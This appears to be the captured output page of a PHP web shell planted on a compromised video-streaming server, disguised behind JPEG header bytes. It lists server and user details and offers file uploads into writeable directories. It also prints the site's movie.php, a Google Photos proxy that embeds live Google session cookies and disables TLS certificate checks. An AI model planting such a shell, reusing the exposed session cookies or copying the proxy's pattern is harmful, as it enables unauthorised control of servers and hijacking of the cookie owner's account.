ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/hls5.vidoe.top/proxy/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/hls5.vidoe.top/proxy/movie.php
<?php
$allowed_domains = array(
    'vidoe.top',
    'www.vidoe.top',
);

/*$allowed = false;
foreach ($allowed_domains as $a) {
    if (preg_match("@https?://$a/.*@", $_SERVER['HTTP_REFERER'])) {
        $allowed = true;
    }
}
if ($allowed) {

}else {
    echo "Ugly domain";
    exit();
}*/

function str_encode($data,$pwd)
{
    $x = 0;
    $a = 0;
    $j = 0;
    $Zcrypt = '';
    $pwd_length = strlen($pwd);
    for ($i = 0; $i < 255; $i++) {
        $key[$i] = ord(substr($pwd, ($i % $pwd_length)+1, 1));
        $counter[$i] = $i;
    }
    for ($i = 0; $i < 255; $i++) {
        $x = ($x + $counter[$i] + $key[$i]) % 256;
        $temp_swap = $counter[$i];
        $counter[$i] = $counter[$x];
        $counter[$x] = $temp_swap;
    }
    for ($i = 0; $i < strlen($data); $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $counter[$a]) % 256;
        $temp = $counter[$a];
        $counter[$a] = $counter[$j];
        $counter[$j] = $temp;
        $k = $counter[(($counter[$a] + $counter[$j]) % 256)];
        $Zcipher = ord(substr($data, $i, 1)) ^ $k;
        $Zcrypt .= chr($Zcipher);
    }
    return $Zcrypt;
}
function curl($url) {
    $ch = curl_init();
    $head[] = "Host: photos.google.com";
    $head[] = "Connection: keep-alive";
    $head[] = "Keep-Alive: 300";
    $head[] = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
    $head[] = "Accept-Language: en-us,en;q=0.5";
    $head[] = "Cookie: NID=204=LmBv7m6W3ELQMP2-vNp14gBijERFIByHndLhEzHQsOqM89rSi_oc3C_bMQFvfbJYY82mzXAIxqxY3iDkbURgiyXpxjRqi0gklm2OUb8g6kY0ZemRqlM9n2dtCC1SsTJJd57_Oht4Kx6aMuyT3v3cImQtgLjF1NZ2tk-cfAFjX3yh-m6qf7YfXsUICseOHAoi9VHXU1UFufCE4RyMaQhrwjiwOs_zkKxu1dAgVj-B_nqSR-ERAhc0E6WmD-jrRUpOYiF4Jmgru6ziU0B-QAh2veAyNlsU4tzFgUvbtgBBmpVxlD84KGJ6fFiweGa2n10ZvaqjBa0; 1P_JAR=2020-11-05-02; CONSENT=YES+VN.vi+20170312-18-0; SEARCH_SAMESITE=CgQI7JAB; SID=2wc-5D3amO6BkLMrkvI9x7eH27ERug_ru5mN2zl35y1pb6epKg0RktrPz8RoptUZ4AeNCQ.; __Secure-3PSID=2wc-5D3amO6BkLMrkvI9x7eH27ERug_ru5mN2zl35y1pb6ep8dcxydEwZdJDy7eEbr48_w.; HSID=AKDdjagLRUK7AHtpS; SSID=A5HT9xevuzaPNXYNA; APISID=DKnjPlXyFfq_rBuq/Al6LUo5_Sav8IR60j; SAPISID=6jGrzfp2pQLx1zRE/AqveKpakqJ9lOMxiK; __Secure-3PAPISID=6jGrzfp2pQLx1zRE/AqveKpakqJ9lOMxiK; SIDCC=AJi4QfFJuTYgeu-qWFdCO9MKL8M2E0-uv7iIcCCYFdsPLN3-cJ2cBRl3PTw0r-vbJHN0GRMuIwY; __Secure-3PSIDCC=AJi4QfFFxyckK1iWMLUHpvl91m_cswFY7_8UMQsb5HVgCWuMV9SLm_K7KbKtcScHDKoBVnlJ1HMB; ANID=AHWqTUlfI5FPHFGYRymgpRT2uwjQEBx-bKjumM1OhOHp5mCEQ2h_GUcmetKOvJYO; CONSISTENCY=AKJVzcpcNwNfOeRxcFEpVQJLKFWEl0Ni4UM9Gtn_MR_Tszkut7F-1S_qC_VOtza_b6WkgzOO2nmRgHFkTYoaFUF15AtOC_EqJg==; OTZ=5704059_28_28__28_";
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36');
    curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_COOKIEJAR,  'cookies-photos-google-com.txt');
    curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies-photos-google-com.txt');
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_TIMEOUT, 60);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    $page = curl_exec($ch);
    curl_close($ch);
    return $page;
}
function getPhotoGoogle($link){
    $get = curl($link);
    $data = explode('url\u003d', $get);
    $have1080p = $have720p = 0;
    if(strpos($get,'%3Dm37')!==false){
        $have1080p = 1;
    }
    if(strpos($get,'%3Dm22')!==false){
        $have720p = 1;
    }


    $url = explode('%3Dm', $data[1]);
    $decode = urldecode($url[0]);
    $count = count($data);
    $linkDownload = array('360p'=>'','720p'=>'','1080p'=>'');

    $v1080p = $decode.'=m37';
    $v720p = $decode.'=m22';
    $v360p = $decode.'=m18';

    $linkDownload['360p'] = $v360p;

    if($have1080p==1){
        $linkDownload['1080p'] = $v1080p;
    }
    if($have720p==1){
        $linkDownload['720p'] = $v720p;
    }
    if($have1080p==0 and $have720p==0){
        preg_match('#video-downloads.googleusercontent.com(.*?)",#is',$get,$match);
        $linkDownload['480p'] = 'https://video-downloads.googleusercontent.com'.$match[1];
    }
    return $linkDownload;
}
if(!isset($_GET['time'])){
    return;
}

$time = $_GET['time'];
$time_check = time()-(12*60*60);
$time_check2 = time()+(12*60*60);
if($time < $time_check){
    return;
}
if($time > $time_check2){
    return;
}

$url_encode = $_GET['p'];
$token = $_GET['token'];
$play =  str_encode(hex2bin($url_encode),$token);
//$play = 'https://photos.google.com/u/1/share/AF1QipPgnyN6JihVNt2Q5TZib-Z659BH1bhsW9hKaaZziofu5b_a_wvPpucPDzyKWHXQ2Q/photo/AF1QipMdr7AXyuv27XcZMgnD3RWE5dgOfDRVik8AVGUd?key=SGFqeWlvQkxMdzRLMDdkSHZhMVRfNEhfRGtDSnp3';
$get = curl($play);

preg_match('#video-downloads.googleusercontent.com(.*?)",#is',$get,$match);
//$test = getPhotoGoogle($play);
$link_play = 'https://video-downloads.googleusercontent.com'.$match[1];
/*$link_encode = bin2hex(str_encode($link_play,'vidoe@top'));
$link_play = 'https://hls.vidoe.top/movie.php?file='.$link_encode;*/
$type = 'video/mp4';
?>
<html style="width: 100%; height: 100%"><head>
    <title>-Server 2 embed-</title>
    <style type="text/css">
        body {
            background: #000000;
            margin: 0px;
            padding: 0px;
        }
    </style>
    <link href="https://img.123vid.top/videojs/video-js.css" rel="stylesheet" />
    <link href="https://img.123vid.top/videojs/vsg-skin.css" rel="stylesheet">
</head>
<body style="width: 100%; height: 100%">
<?php
if($link_play !='') {

    ?>
    <video autoplay controls id="ht_player" style="width: 100%; height: 100%" class="video-js vjs-theme-forest vjs-16-9"
           preload="auto" poster="" data-setup="{ }">
        <source src="<?php echo $link_play; ?>" type='<?php echo $type;?>'/>
        <p>Video Playback Not Supported</p>
    </video>
    <script type="text/javascript">
        //var player = videojs('#ht_player');
        //player.play();
    </script>
    <?php
}
?>
<script src="https://img.123vid.top/videojs/video.js"></script>
<script src="https://img.123vid.top/videojs/videojs-contrib-hls.js"></script>
<script type="text/javascript">
    var player = videojs('#ht_player');
    player.on('contextmenu', function(e) {
        e.preventDefault();
    });
</script>
</body></html>

ZeroDay Forums Mini